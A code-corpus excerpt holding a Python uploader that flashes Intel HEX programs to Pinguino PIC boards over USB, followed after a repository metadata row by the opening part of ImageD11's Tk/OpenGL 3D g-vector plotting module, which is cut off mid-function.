|_| _|_____|_| \_|\_____|\____/|_____|_| \_|\____/
| | | | | |
___| |_ __ _ _ __ __| | __ _| | ___ _ __ ___
/ __| __/ _` | '_ \ / _` |/ _` | |/ _ \| '_ \ / _ \
\__ \ || (_| | | | | (_| | (_| | | (_) | | | | __/
|___/\__\__,_|_| |_|\__,_|\__,_|_|\___/|_| |_|\___|
___ _ _ _ _ _ _ _
/ _ \ | | (_) | | | | | | | | |
| (_) |_____| |__ _| |_ | | | |_ __ | | ___ __ _ __| | ___ _ __
> _ <______| '_ \| | __| | | | | '_ \| |/ _ \ / _` |/ _` |/ _ \ '__|
| (_) | | |_) | | |_ | |__| | |_) | | (_) | (_| | (_| | __/ |
\___/ |_.__/|_|\__| \____/| .__/|_|\___/ \__,_|\__,_|\___|_|
| |
|_|
Author: Regis Blanchot <[email protected]>
--------------------------------------------------------------------
2013-11-13 - RB - first release
2015-09-08 - RB - fixed numBlocks > numBlocksMax when used with XC8
2016-08-27 - RB - added PIC16F145x support
2016-08-28 - RB - added Python3 support
2016-08-29 - RB - added usb.core functions (PYUSB_USE_CORE)
2016-11-23 - RB - changed constant writeBlockSize to variable writeBlockSize
--------------------------------------------------------------------
This library is free software you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.
51 Franklin Street, Fifth Floor
Boston, MA 02110-1301 USA
---------------------------------------------------------------------"""
#-----------------------------------------------------------------------
# Usage: uploader8.py mcu path/filename.hex
# Ex : uploader8.py 16F1459 tools/Blink1459.hex
#-----------------------------------------------------------------------
# This class is based on :
# - Diolan USB bootloader licenced (LGPL) by Diolan <http://www.diolan.com>
# - jallib USB bootloader licenced (BSD) by Albert Faber
# See also PyUSB Doc. http://wiki.erazor-zone.de/wiki:projects:python:pyusb:pydoc
# Pinguino Device Descriptors : lsusb -v -d 04d8:feaa
#-----------------------------------------------------------------------
# Debug: export PYUSB_DEBUG=debug
#-----------------------------------------------------------------------
import sys
import os
import usb
#import usb.core
#import usb.util
# PyUSB Core module switch
#-----------------------------------------------------------------------
PYUSB_USE_CORE = 1 # 0=legacy, 1=core
# Globales
#-----------------------------------------------------------------------
# 8-bit Pinguino's ID
#-----------------------------------------------------------------------
VENDOR_ID = 0x04D8 # Microchip License
PRODUCT_ID = 0xFEAA # Pinguino Sub-License
# Hex format record types
#-----------------------------------------------------------------------
Data_Record = 0
End_Of_File_Record = 1
Extended_Segment_Address_Record = 2
Start_Segment_Address_Record = 3
Extended_Linear_Address_Record = 4
Start_Linear_Address_Record = 5
# usbBuf Data Packet Structure
#-----------------------------------------------------------------------
# __________________
# | COMMAND | 0 [BOOT_CMD]
# | LEN/SIZE | 1 [BOOT_CMD_LEN] or [BOOT_SIZE]
# | ADDRL | 2 [BOOT_ADDR_LO] or [BOOT_VER_MINOR]
# | ADDRH | 3 [BOOT_ADDR_HI] or [BOOT_VER_MAJOR ]
# | ADDRU | 4 [BOOT_ADDR_UP]
# | | 5 [BOOT_DATA_START] or [BOOT_DEV1] or [BOOT_REV1]
# | | 6 [BOOT_DEV2] or [BOOT_REV2]
# . .
# . DATA .
# . .
# | | 62
# |________________| 63
#
#-----------------------------------------------------------------------
BOOT_CMD = 0
BOOT_CMD_LEN = 1
BOOT_ADDR_LO = 2
BOOT_ADDR_HI = 3
BOOT_ADDR_UP = 4
BOOT_DATA_START = 5
BOOT_SIZE = 1
BOOT_VER_MINOR = 2
BOOT_VER_MAJOR = 3
BOOT_REV1 = 5
BOOT_REV2 = 6
BOOT_DEV1 = 7
BOOT_DEV2 = 8
# Bootloader commands
#-----------------------------------------------------------------------
READ_VERSION_CMD = 0x00
READ_FLASH_CMD = 0x01
WRITE_FLASH_CMD = 0x02
ERASE_FLASH_CMD = 0x03
#READ_EEDATA_CMD = 0x04
#WRITE_EEDATA_CMD = 0x05
#READ_CONFIG_CMD = 0x06
#WRITE_CONFIG_CMD = 0x07
RESET_CMD = 0xFF
# USB Max. Packet size
#-----------------------------------------------------------------------
MAXPACKETSIZE = 64
# Bulk endpoints
#-----------------------------------------------------------------------
IN_EP = 0x81 # endpoint for Bulk reads
OUT_EP = 0x01 # endpoint for Bulk writes
# Configuration
#-----------------------------------------------------------------------
ACTIVE_CONFIG = 0x01
INTERFACE_ID = 0x00
TIMEOUT = 10000
# Error codes returned by various functions
#-----------------------------------------------------------------------
ERR_NONE = 0
ERR_CMD_ARG = 1
ERR_CMD_UNKNOWN = 2
ERR_DEVICE_NOT_FOUND = 3
ERR_USB_INIT1 = 4
ERR_USB_INIT2 = 5
ERR_USB_OPEN = 6
ERR_USB_WRITE = 7
ERR_USB_READ = 8
ERR_HEX_OPEN = 9
ERR_HEX_STAT = 10
ERR_HEX_MMAP = 11
ERR_HEX_SYNTAX = 12
ERR_HEX_CHECKSUM = 13
ERR_HEX_RECORD = 14
ERR_VERIFY = 15
ERR_EOL = 16
ERR_USB_ERASE = 17
# Table with supported USB devices
# device_id:[PIC name, flash size(in bytes), eeprom size (in bytes)]
#-----------------------------------------------------------------------
devices_table = \
{
# 16F
0x3020: ['16f1454' , 0x02000, 0x00 ],
0x3021: ['16f1455' , 0x02000, 0x00 ],
0x3023: ['16f1459' , 0x02000, 0x00 ],
0x3024: ['16lf1454' , 0x02000, 0x00 ],
0x3025: ['16lf1455' , 0x02000, 0x00 ],
0x3027: ['16lf1459' , 0x02000, 0x00 ],
# 18F
0x4740: ['18f13k50' , 0x02000, 0x80 ],
0x4700: ['18lf13k50' , 0x02000, 0x80 ],
0x4760: ['18f14k50' , 0x04000, 0xff ],
0x4720: ['18f14k50' , 0x04000, 0xff ],
0x2420: ['18f2450' , 0x04000, 0x00 ],
0x1260: ['18f2455' , 0x06000, 0xff ],
0x2a60: ['18f2458' , 0x06000, 0xff ],
0x4c00: ['18f24j50' , 0x04000, 0x00 ],
0x4cc0: ['18lf24j50' , 0x04000, 0x00 ],
0x1240: ['18f2550' , 0x08000, 0xff ],
0x2a40: ['18f2553' , 0x08000, 0xff ],
0x4c20: ['18f25j50' , 0x08000, 0x00 ],
0x4ce0: ['18lf25j50' , 0x08000, 0x00 ],
0x5c20: ['18f25k50' , 0x08000, 0xff ],
0x5ca0: ['18lf25k50' , 0x08000, 0xff ],
0x4c40: ['18f26j50' , 0x10000, 0x00 ],
0x4d00: ['18lf26j50' , 0x10000, 0x00 ],
0x5860: ['18f27j53' , 0x20000, 0x00 ],
0x1200: ['18f4450' , 0x04000, 0x00 ],
0x1220: ['18f4455' , 0x06000, 0x00 ],
0x2a20: ['18f4458' , 0x06000, 0xff ],
0x4c60: ['18f44j50' , 0x04000, 0x00 ],
0x4d20: ['18lf44j50' , 0x04000, 0x00 ],
0x1200: ['18f4550' , 0x08000, 0xff ],
0x2a00: ['18f4553' , 0x08000, 0xff ],
0x4c80: ['18f45j50' , 0x08000, 0x00 ],
0x4d40: ['18lf45j50' , 0x08000, 0x00 ],
0x5C00: ['18f45k50' , 0x08000, 0xff ],
0x5C80: ['18lf45k50' , 0x08000, 0xff ],
0x4ca0: ['18f46j50' , 0x10000, 0x00 ],
0x4d60: ['18f46j50' , 0x10000, 0x00 ],
0x58e0: ['18f47j53' , 0x20000, 0x00 ],
0x4100: ['18f65j50' , 0x08000, 0x00 ],
0x1560: ['18f66j50' , 0x10000, 0x00 ],
0x4160: ['18f66j55' , 0x18000, 0x00 ],
0x4180: ['18f67j50' , 0x20000, 0x00 ],
0x41a0: ['18f85j50' , 0x08000, 0x00 ],
0x41e0: ['18f86j50' , 0x10000, 0x00 ],
0x1f40: ['18f86j55' , 0x18000, 0x00 ],
0x4220: ['18f87j50' , 0x20000, 0x00 ]
}
# ----------------------------------------------------------------------
def getDevice(vendor, product):
# ----------------------------------------------------------------------
""" search USB device and returns a DeviceHandle object """
if PYUSB_USE_CORE:
device = usb.core.find(idVendor=vendor, idProduct=product)
#print(device)
if device is None :
return ERR_DEVICE_NOT_FOUND
else :
return device
else:
busses = usb.busses()
for bus in busses:
#print(bus)
for device in bus.devices:
#print(device)
if (device.idVendor, device.idProduct) == (vendor, product):
return device
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def initDevice(device):
# ----------------------------------------------------------------------
""" init pinguino device """
if PYUSB_USE_CORE:
if os.getenv("PINGUINO_OS_NAME") == "linux":
try:
active = device.is_kernel_driver_active(INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not detach kernel driver: %s" % str(e))
if active :
#print("Kernel driver detached")
try:
device.detach_kernel_driver(INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not detach kernel driver: %s" % str(e))
#else:
#print("No kernel driver attached")
# The call to set_configuration must come before
# claim_interface (which, btw, is optional).
try:
device.set_configuration(ACTIVE_CONFIG)
except usb.core.USBError as e:
sys.exit("Aborting: could not set configuration: %s" % str(e))
try:
usb.util.claim_interface(device, INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not claim interface: %s" % str(e))
return device
else:
handle = device.open()
if handle:
#print(handle)
try:
handle.detachKernelDriver(INTERFACE_ID)
except:
#print("Could not detatch kernel driver from interface")
pass
try:
handle.setConfiguration(ACTIVE_CONFIG)
except:
sys.exit("Aborting: could not set configuration")
try:
handle.claimInterface(INTERFACE_ID)
except:
#print("Could not claim interface")
pass
return handle
return ERR_USB_INIT1
# ----------------------------------------------------------------------
def closeDevice(handle):
# ----------------------------------------------------------------------
""" Close currently-open USB device """
if PYUSB_USE_CORE:
usb.util.release_interface(handle, INTERFACE_ID)
else:
handle.releaseInterface()
# ----------------------------------------------------------------------
def sendCommand(handle, usbBuf):
# ----------------------------------------------------------------------
""" send command to the bootloader """
if PYUSB_USE_CORE:
sent_bytes = handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
sent_bytes = handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
if sent_bytes != len(usbBuf):
return ERR_USB_WRITE
if PYUSB_USE_CORE:
return handle.read(IN_EP, MAXPACKETSIZE, TIMEOUT)
else:
return handle.bulkRead(IN_EP, MAXPACKETSIZE, TIMEOUT)
# ----------------------------------------------------------------------
def resetDevice(handle):
# ----------------------------------------------------------------------
""" send reset command to the bootloader """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = RESET_CMD
# write data packet
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#usbBuf = sendCommand(handle, usbBuf)
#print usbBuf
#handle.reset()
# ----------------------------------------------------------------------
def getVersion(handle):
# ----------------------------------------------------------------------
""" get bootloader version """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = READ_VERSION_CMD
# write data packet and get response
usbBuf = sendCommand(handle, usbBuf)
if usbBuf == ERR_USB_WRITE:
return ERR_USB_WRITE
else:
# major.minor
return str(usbBuf[BOOT_VER_MAJOR]) + "." + \
str(usbBuf[BOOT_VER_MINOR])
# ----------------------------------------------------------------------
def getDeviceID(handle, proc):
# ----------------------------------------------------------------------
""" read 2-byte device ID from
PIC18F : 0x3FFFFE
PIC16F : 0x8005 """
#print(proc)
if ("16f" in proc):
# REVISION & DEVICE ID
usbBuf = readFlash(handle, 0x8005, 4)
if usbBuf == ERR_USB_WRITE or usbBuf is None:
return ERR_USB_WRITE, ERR_USB_WRITE
rev1 = usbBuf[BOOT_REV1]
rev2 = usbBuf[BOOT_REV2]
device_rev = (int(rev2) << 8) + int(rev1)
dev1 = usbBuf[BOOT_DEV1]
dev2 = usbBuf[BOOT_DEV2]
device_id = (int(dev2) << 8) + int(dev1)
else:
# REVISION & DEVICE ID
usbBuf = readFlash(handle, 0x3FFFFE, 2)
#print usbBuf
if usbBuf == ERR_USB_WRITE or usbBuf is None:
return ERR_USB_WRITE, ERR_USB_WRITE
#print("BUFFER =", usbBuf
dev1 = usbBuf[BOOT_REV1]
#print("DEV1 =", dev1
dev2 = usbBuf[BOOT_REV2]
#print("DEV2 =", dev2
device_id = (int(dev2) << 8) + int(dev1)
device_id = device_id & 0xFFE0
#print device_id
device_rev = device_id & 0x001F
#print device_rev
return device_id, device_rev
# ----------------------------------------------------------------------
def getDeviceFlash(device_id):
# ----------------------------------------------------------------------
""" get flash memory info """
for n in devices_table:
if n == device_id:
return devices_table[n][1]
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def getDeviceName(device_id):
# ----------------------------------------------------------------------
""" get device chip name """
for n in devices_table:
if n == device_id:
return devices_table[n][0]
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def eraseFlash(handle, address, numBlocks):
# ----------------------------------------------------------------------
""" erase n * 64- or 1024-byte blocks of flash memory """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = ERASE_FLASH_CMD
# number of blocks to erase
usbBuf[BOOT_SIZE] = numBlocks
# 1rst block address
# NB : must be divisible by 64 or 1024 depending on PIC model
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# write data packet
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def readFlash(handle, address, length):
# ----------------------------------------------------------------------
""" read a block of flash """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = READ_FLASH_CMD
# size of block
usbBuf[BOOT_CMD_LEN] = length
# address
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# send request to the bootloader
return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def writeFlash(handle, address, datablock):
# ----------------------------------------------------------------------
""" write a block of code
first 5 bytes are for block description
(BOOT_CMD, BOOT_CMD_LEN and BOOT_ADDR)
data block size should be of writeBlockSize bytes
total length is then writeBlockSize + 5 < MAXPACKETSIZE """
usbBuf = [0xFF] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = WRITE_FLASH_CMD
# size of block
usbBuf[BOOT_CMD_LEN] = len(datablock)
# block's address
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# add data to the packet
#for i in range(len(datablock)):
# usbBuf[BOOT_DATA_START + i] = datablock[i]
usbBuf[BOOT_DATA_START:] = datablock
#print usbBuf
# write data packet on usb device
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def hexWrite(handle, filename, proc, memstart, memend):
# ----------------------------------------------------------------------
""" Parse the Hex File Format and send data to usb device
[0] Start code, one character, an ASCII colon ':'.
[1:3] Byte count, two hex digits.
[3:7] Address, four hex digits, a 16-bit address of the beginning
of the memory position for the data. Limited to 64 kilobytes,
the limit is worked around by specifying higher bits via
additional record types. This address is big endian.
[7:9] Record type, two hex digits, 00 to 05, defining the type of
the data field.
[9:*] Data, a sequence of n bytes of the data themselves,
represented by 2n hex digits.
[*:*] Checksum, two hex digits - the least significant byte of the
two's complement of the sum of the values of all fields
except fields 1 and 6 (Start code ":" byte and two hex digits
of the Checksum). It is calculated by adding together the
hex-encoded bytes (hex digit pairs), then leaving only the
least significant byte of the result, and making a 2's
complement (either by subtracting the byte from 0x100,
or inverting it by XOR-ing with 0xFF and adding 0x01).
If you are not working with 8-bit variables,
you must suppress the overflow by AND-ing the result with
0xFF. The overflow may occur since both 0x100-0 and
(0x00 XOR 0xFF)+1 equal 0x100. If the checksum is correctly
calculated, adding all the bytes (the Byte count, both bytes
in Address, the Record type, each Data byte and the Checksum)
together will always result in a value wherein the least
significant byte is zero (0x00).
For example, on :0300300002337A1E
03 + 00 + 30 + 00 + 02 + 33 + 7A = E2, 2's complement is 1E
"""
# Addresses are doubled in the PIC16F HEX file
if ("16f" in proc):
memstart = memstart * 2
memend = memend * 2
#print("memstart = 0x%X" % memstart)
#print("memend = 0x%X" % memend)
data = []
old_max_address = memstart
old_min_address = memend
max_address = 0
min_address = 0
address_Hi = 0
codesize = 0
# size of write block
# ------------------------------------------------------------------
if "13k50" in proc :
writeBlockSize = 8
elif "14k50" in proc :
writeBlockSize = 16
else :
writeBlockSize = 32
# size of erase block
# --------------------------------------------------------------
# Pinguino x6j50 or x7j53, erased blocks are 1024-byte long
if ("j" in proc):
eraseBlockSize = 1024
# Pinguino x455, x550 or x5k50, erased blocks are 64-byte long
else:
eraseBlockSize = 64
#print("eraseBlockSize = %d" % eraseBlockSize
# image of the whole PIC memory (above memstart)
# --------------------------------------------------------------
for i in range(memend - memstart):
data.append(0xFF)
# read hex file
# ------------------------------------------------------------------
hexfile = open(filename,'r')
lines = hexfile.readlines()
hexfile.close()
# calculate checksum, code size and memmax
# ------------------------------------------------------------------
for line in lines:
byte_count = int(line[1:3], 16)
# lower 16 bits (bits 0-15) of the data address
address_Lo = int(line[3:7], 16)
record_type= int(line[7:9], 16)
# checksum calculation (optional if speed is critical)
end = 9 + byte_count * 2 # position of checksum at end of line
checksum = int(line[end:end+2], 16)
cs = 0
i = 1
while i < end:
cs = cs + (0x100 - int(line[i:i+2], 16) ) & 0xFF # not(i)
i = i + 2
if checksum != cs:
return ERR_HEX_CHECKSUM
# extended linear address record
if record_type == Extended_Linear_Address_Record:
# upper 16 bits (bits 16-31) of the data address
address_Hi = int(line[9:13], 16) << 16
#print address_Hi
# data record
elif record_type == Data_Record:
# data's 32-bit address calculation
address = address_Hi + address_Lo
#print("address = %X" % address
# min address
if (address < old_min_address) and (address >= memstart):
min_address = address
old_min_address = address
#print("min. address : 0x%X" % old_min_address
# max address
if (address > old_max_address) and (address < memend):
max_address = address + byte_count
old_max_address = address
#print("end_address = %X" % end_address
if (address >= memstart) and (address < memend):
# code size calculation
codesize = codesize + byte_count
# append data
for i in range(byte_count):
if ((address + i) < memend):
#Caution : addresses are not always contiguous
#data.append(int(line[9 + (2 * i) : 11 + (2 * i)], 16))
#data[address - memstart + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16)
data[address - min_address + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16)
#print line[9 + (2 * i) : 11 + (2 * i)],
# end of file record
elif record_type == End_Of_File_Record:
break
# unsupported record type
else:
return ERR_HEX_RECORD
# max_address must be divisible by eraseBlockSize
# ------------------------------------------------------------------
#min_address = min_address - eraseBlockSize - (min_address % eraseBlockSize)
max_address = max_address + eraseBlockSize - (max_address % eraseBlockSize)
if (max_address > memend):
max_address = memend
#print("min_address = 0x%X" % min_address
#print("max_address = 0x%X" % max_address
# erase memory from memstart to max_address
# ------------------------------------------------------------------
numBlocksMax = (memend - memstart) / eraseBlockSize
numBlocks = (max_address - memstart) / eraseBlockSize
#print("memend = %d" % memend
#print("memmax = %d" % memmax
#print("memstart = %d" % memstart
#print("numBlocks = %d" % numBlocks
#print("numBlocksMax = %d" % numBlocksMax
if numBlocks > numBlocksMax:
#numBlocks = numBlocksMax
return ERR_USB_ERASE
if numBlocks < 256:
status = eraseFlash(handle, memstart, numBlocks)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
else:
numBlocks = numBlocks - 255
upperAddress = memstart + 255 * eraseBlockSize
# from self.board.memstart to upperAddress
status = eraseFlash(handle, memstart, 255)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
# erase flash memory from upperAddress to memmax
status = eraseFlash(handle, upperAddress, numBlocks)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
# write blocks of writeBlockSize bytes
# ------------------------------------------------------------------
for addr8 in range(min_address, max_address, writeBlockSize):
index = addr8 - min_address
# the addresses are doubled in the PIC16F HEX file
if ("16f" in proc):
addr16 = addr8 / 2
status = writeFlash(handle, addr16, data[index:index+writeBlockSize])
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
#print("addr8=0x%X addr16=0x%X" % (addr8, addr16)
#print("0x%X [%s]" % (addr16, data[index:index+writeBlockSize])
else:
status = writeFlash(handle, addr8, data[index:index+writeBlockSize])
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
#print("0x%X [%s]" % (addr8, data[index:index+writeBlockSize])
data[:] = [] # clear the list
print("%d bytes written" % codesize)
return ERR_NONE
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def main(mcu, filename):
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# check file to upload
# ------------------------------------------------------------------
if filename == '':
closeDevice(handle)
sys.exit("Aborting: no program to write")
hexfile = open(filename, 'r')
if hexfile == "":
sys.exit("Aborting: unable to open %s" % filename)
hexfile.close()
# search for a Pinguino board
# ------------------------------------------------------------------
print("Looking for a Pinguino board ...")
device = getDevice(VENDOR_ID, PRODUCT_ID)
if device == ERR_DEVICE_NOT_FOUND:
sys.exit("Aborting: Pinguino not found. Is your device connected and/or in bootloader mode ?")
else:
print("Pinguino found ...")
handle = initDevice(device)
#print(handle)
if handle == ERR_USB_INIT1:
print("... but upload is not possible.")
print("Press the Reset button and try again.")
sys.exit(0)
# find out the processor
# ------------------------------------------------------------------
mcu = mcu.lower()
device_id, device_rev = getDeviceID(handle, mcu)
if device_id == ERR_USB_WRITE:
closeDevice(handle)
sys.exit("Aborting: unknown device ID")
proc = getDeviceName(device_id)
if proc == ERR_DEVICE_NOT_FOUND:
closeDevice(handle)
sys.exit("Aborting: unknown PIC (id=0x%X)" % device_id)
elif proc != mcu:
closeDevice(handle)
sys.exit("Aborting: program compiled for %s but device has %s" % (mcu, proc))
else:
print(" - with PIC%s (id=0x%X, rev=%x)" % (proc, device_id, device_rev))
# find out flash memory size
# ------------------------------------------------------------------
# lower limit of the flash memory (bootloader offset)
# TODO : get it from the bootloader (cf. APPSTART)
if ("16f" in proc):
memstart = 0x800
else:
memstart = 0xC00
# upper limit of the flash memory
memend = getDeviceFlash(device_id)
memfree = memend - memstart;
print(" - with %d bytes free (%.2f/%d KB)" % (memfree, memfree/1024, memend/1024))
print(" from 0x%05X to 0x%05X" % (memstart, memend))
# find out bootloader version
# ------------------------------------------------------------------
#product = handle.getString(device.iProduct, 30)
#manufacturer = handle.getString(device.iManufacturer, 30)
print(" - with USB bootloader v%s" % getVersion(handle))
# start writing
# ------------------------------------------------------------------
print("Uploading user program ...")
status = hexWrite(handle, filename, proc, memstart, memend)
#print status
if status == ERR_HEX_RECORD:
closeDevice(handle)
sys.exit("Aborting: record error")
elif status == ERR_HEX_CHECKSUM:
closeDevice(handle)
sys.exit("Aborting: checksum error")
elif status == ERR_USB_ERASE:
print("Aborting: erase error")
closeDevice(handle)
sys.exit(0)
elif status == ERR_NONE:
print("%s successfully uploaded" % os.path.basename(filename))
# reset and start start user's app.
# ------------------------------------------------------------------
resetDevice(handle)
# Device can't be closed because it just has been reseted
#closeDevice(handle)
sys.exit("Starting user program ...")
else:
sys.exit("Aborting: unknown error")
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
if __name__ == "__main__":
print("We use Python v%d.%d + PyUSB.%s" %
(sys.version_info[0],
sys.version_info[1],
"core" if PYUSB_USE_CORE else "legacy"))
i = -1
for arg in sys.argv:
i = i + 1
if i == 2:
main(sys.argv[1], sys.argv[2])
else:
sys.exit("Usage ex: uploader8.py 16f1459 tools/Blink1459.hex")
| gpl-2.0 | -3,979,081,066,942,806,500 | 36.135074 | 102 | 0.447671 | false | 3.917146 | true | false | false |
jonwright/ImageD11 | ImageD11/tkGui/plot3d.py | 1 | 11957 | #!/usr/bin/env python
from __future__ import print_function
"""
from example by Tarn Weisner Burton <[email protected]> in pyopengl
"""
__author__ = 'Jon Wright <[email protected]> from example by Tarn Weisner Burton <[email protected]>'
import numpy
import sys
import os
from pyopengltk import Opengl
import OpenGL.GL as GL
import OpenGL.GLU as GLU
if sys.version_info[0] < 3:
import Tkinter as Tk
else:
import tkinter as Tk
class myOpengl(Opengl):
# Make a parallel projection
# mostly copied from Tk.Opengl class with small mods
def tkRedraw(self, *dummy):
"""Cause the opengl widget to redraw itself."""
if not self.initialised:
return
self.activate()
#print self.distance
GL.glPushMatrix() # Protect our matrix
self.update_idletasks()
self.activate()
w = self.winfo_width()
h = self.winfo_height()
GL.glViewport(0, 0, w, h)
# Clear the background and depth buffer.
GL.glClearColor(self.r_back, self.g_back, self.b_back, 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glMatrixMode(GL.GL_PROJECTION)
GL.glLoadIdentity()
r = 1.*w/h
GL.glOrtho( -self.distance*r, self.distance*r, -self.distance, self.distance,
-self.distance*3, self.distance*3)
# GLU.gluPerspective(self.fovy, float(w)/float(h), self.near, self.far)
GL.glMatrixMode(GL.GL_MODELVIEW)
self.redraw(self)
GL.glFlush() # Tidy up
GL.glPopMatrix() # Restore the matrix
# self.tk.call(self._w, 'swapbuffers')
self.tkSwapBuffers()
class plot3d(Tk.Toplevel):
def __init__(self,parent,data=None,lines=None,
ubis=None,image=None,pars=None,spline=None):
"""
Data would be your observed g-vectors. Lines will
be a computed lattice
"""
Tk.Toplevel.__init__(self,parent)
self.parent=parent
if data is not None:
xyz=data.copy()
else:
xyz=numpy.array([0,0,0])
self.ps=Tk.StringVar()
self.ps.set('1.')
self.pointsize=1.
self.npeaks=xyz.shape[0]
self.o = myOpengl(self, width = 400, height = 400)
self.o.redraw = self.redraw
self.o.autospin_allowed = 1
self.o.fovy=5
self.o.near=1e6
self.o.far=1e-6
import math
self.o.distance=3.
#numpy.maximum.reduce(numpy.ravel(xyz))*4 / \
# math.tan(self.o.fovy*math.pi/180)
print(type(xyz),xyz.dtype.char,xyz.shape)
self.xyz=xyz
f=Tk.Frame(self)
Tk.Button(f,text="Help",command=self.o.help).pack(side=Tk.LEFT)
Tk.Button(f,text="Reset",command=self.o.reset).pack(side=Tk.LEFT)
Tk.Button(f,text="Pointsize",command=self.setps).pack(side=Tk.LEFT)
Tk.Entry(f,textvariable=self.ps).pack(side=Tk.LEFT)
Tk.Button(f,text="Quit",command=self.goaway).pack(side=Tk.RIGHT)
self.dataoff=0
self.o.pack(side = 'top', expand = 1, fill = 'both')
f.pack(side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X)
Tk.Label(self,text="Red=[1,0,0] Green=[0,1,0] Blue=[0,0,1]").pack(
side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X)
self.ubis=ubis
self.color=numpy.ones((xyz.shape[0],3),numpy.float)
print(self.color.shape)
self.tex=False
if ubis is not None:
self.ubis = self.readubis(ubis)
self.scorecolor(0)
if pars is not None:
self.tex=True
self.readspline(spline)
self.readprms(pars)
self.readimage(image)
self.after(100, self.changedata)
def readspline(self,spline):
from ImageD11 import blobcorrector
self.corrector = blobcorrector.correctorclass(spline)
def readubis(self,ubis):
from ImageD11 import indexing
return indexing.readubis(ubis)
def readprms(self,prms):
from ImageD11 import parameters
o = parameters.parameters()
o.loadparameters(prms)
self.pars=o.get_parameters()
def readimage(self,image):
from ImageD11 import transform
from fabio import openimage
self.imageobj=openimage.openimage(image)
# map from 2048x2048 to 1024x1024
d = self.imageobj.data.astype(numpy.float32)
mi= d.mean() - d.std()*2
mx= d.mean() * d.std()*2
shape=self.imageobj.data.shape
d=numpy.reshape(numpy.clip(self.imageobj.data,mi,mx),shape) # makes a clipped copy
d=(255.*(d-mi)/(mx-mi)) # scale intensity
print(d.min(),d.max(),d.mean())
self.image=numpy.zeros((1024,1024),numpy.uint8)
if d.shape==(2048,2048):
# rebin 2x2
im=(d[::2,::2]+d[::2,1::2]+d[1::2,::2]+d[1::2,1::2])/4
self.image=(255-im).astype(numpy.uint8).tostring()
self.imageWidth=1024
self.imageHeight=1024
# make a 2D array of x,y
p=[]
pk=[]
step = 64
r=[ [ 0,0 ], [0,step], [step,step], [step,0] ]
for i in range(0,1024,step):
for j in range(0,1024,step):
# i,j 1024x1024 texture coords
# x,y spatially corrected
for v in r:
pk.append([i+v[0],j+v[1]])
x,y = self.corrector.correct((i+v[0])*2 , (j+v[1])*2) # corrected
p.append([x,y])
p=numpy.array(p).T
pk=numpy.array(pk).T
omega=float(self.imageobj.header['Omega'])
self.pars['distance']=float(self.pars['distance'])*1000
tth,eta=transform.compute_tth_eta(p,**self.pars)
gve = transform.compute_g_vectors(tth,eta,omega*self.pars['omegasign'],self.pars['wavelength'])
self.pts = []
print("Setting up image mapping",p.shape,gve.shape)
for i in range(pk.shape[1]):
self.pts.append([pk[1,i]/1024.,pk[0,i]/1024.,gve[0,i],gve[1,i],gve[2,i]])
#for p in self.pts:
# print p
self.setupTexture()
def setupTexture(self):
GL.glDisable(GL.GL_TEXTURE_2D)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexImage2D(GL.GL_TEXTURE_2D,#target
0,#level
3,#internalformat
self.imageWidth, self.imageHeight,
0,#border
GL.GL_LUMINANCE,#format
GL.GL_UNSIGNED_BYTE,# type
self.image)
